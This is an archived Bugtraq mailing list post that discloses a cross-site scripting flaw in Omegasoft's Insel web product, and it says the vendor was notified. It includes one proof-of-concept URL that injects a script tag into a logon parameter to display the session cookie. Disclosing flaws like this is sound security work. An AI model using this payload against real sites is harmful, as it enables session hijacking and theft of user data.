Bugtraq mailing list archives
XSS in Omegasoft's Insel
From: "MC Iglo" <mc.iglo () ddclan de>
Date: Fri, 26 May 2006 16:09:00 +0200
Hi together, This also works on serveral web-pages of this product. http://host/OmegaMw7a.ASP?WCI=Logon&WCE=0;<script>alert(unescape(document.cookie));</script> There might be some ways for SQL-Injection, too, but i am not willing to try this at the real system :) Vendor notified as CC regards MC.Iglo
Current thread:
- XSS in Omegasoft's Insel MC Iglo (May 26)